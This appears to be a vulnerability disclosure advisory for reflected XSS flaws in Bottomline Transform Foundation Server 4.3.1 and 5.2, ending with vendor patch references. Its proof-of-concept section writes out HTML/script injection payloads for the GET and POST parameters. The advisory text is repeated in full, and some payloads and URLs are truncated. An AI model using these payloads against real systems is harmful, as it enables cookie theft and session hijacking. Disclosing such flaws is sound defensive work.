I. VULNERABILITY
-------------------------
Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1
and 5.2 from Bottomline Technologies
II. BACKGROUND
-------------------------
Bottomline offers powerful, next-generation electronic document solutions
for formatting,
personalizing and delivering ERP and business application output.
III. DESCRIPTION
-------------------------
Has been detected several Reflected XSS vulnerability in Transform
Foundation server 4.3.1 and 5.2
1. XSS on GET parameters:
http://XXXXXXXXX/
http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi
2. XSS on POST parameters:
URL: XXXXXXXXX/
PARAMETERS:
db="XSS CODE"
referer="XSS CODE"
IV. PROOF OF CONCEPT
-------------------------
GET:
The application does not validate the parameter "pn" correctly.
http://XXXXXXXXX/
ONLOAD=alert('Hacked-by-J.Fco-
http://XXXXXXXXXXXXX/<BODY
ONLOAD=alert('Hacked-by-J.Fco-
POST:
The application does not validate the parameter "db" and "rerferer"
correctly.
XXXXXXXXX/
db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-
and
referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser
allowing Cookie Theft/Session Hijacking, thus enabling full access the
box.
VI. SYSTEMS AFFECTED
-------------------------
Transform Foundation Server 4.3.1
Transform Foundation Server 5.2
VII. SOLUTION
-------------------------
Patches released by the vendor available on customer portal and information
available here:
1. Transform Foundation Server 4.3.1 Patch 8:
http://www.pdf-archive.com/
SF2351630
SF2364411
SF2391461
2. Transform Foundation Server 5.2 Patch 7:
http://www.pdf-archive.com/
SF2351630
SF2364411
SF2391461
http://cve.mitre.org/cgi-bin/
Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/
@Jfran_cbit
-------------------------
Reflected XSS Attacks vulnerabilities in Transform Foundation server 4.3.1
and 5.2 from Bottomline Technologies
II. BACKGROUND
-------------------------
Bottomline offers powerful, next-generation electronic document solutions
for formatting,
personalizing and delivering ERP and business application output.
III. DESCRIPTION
-------------------------
Has been detected several Reflected XSS vulnerability in Transform
Foundation server 4.3.1 and 5.2
1. XSS on GET parameters:
http://XXXXXXXXX/
http://XXXXXXXXXXXXX/"XSS CODE"server-status.cgi
2. XSS on POST parameters:
URL: XXXXXXXXX/
PARAMETERS:
db="XSS CODE"
referer="XSS CODE"
IV. PROOF OF CONCEPT
-------------------------
GET:
The application does not validate the parameter "pn" correctly.
http://XXXXXXXXX/
ONLOAD=alert('Hacked-by-J.Fco-
http://XXXXXXXXXXXXX/<BODY
ONLOAD=alert('Hacked-by-J.Fco-
POST:
The application does not validate the parameter "db" and "rerferer"
correctly.
XXXXXXXXX/
db=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-
and
referer=</td></tr><BODY ONLOAD=alert('Hacked-by-J.Fco-
V. BUSINESS IMPACT
-------------------------
An attacker can execute arbitrary HTML or script code in a targeted
user's browser, that allows the execution of arbitrary HTML/script
code to be executed in the context of the victim user's browser
allowing Cookie Theft/Session Hijacking, thus enabling full access the
box.
VI. SYSTEMS AFFECTED
-------------------------
Transform Foundation Server 4.3.1
Transform Foundation Server 5.2
VII. SOLUTION
-------------------------
Patches released by the vendor available on customer portal and information
available here:
1. Transform Foundation Server 4.3.1 Patch 8:
http://www.pdf-archive.com/
SF2351630
SF2364411
SF2391461
2. Transform Foundation Server 5.2 Patch 7:
http://www.pdf-archive.com/
SF2351630
SF2364411
SF2391461
http://cve.mitre.org/cgi-bin/
Detected and reported by J. Francisco Bolivar (es.linkedin.com/in/jfbolivar/
@Jfran_cbit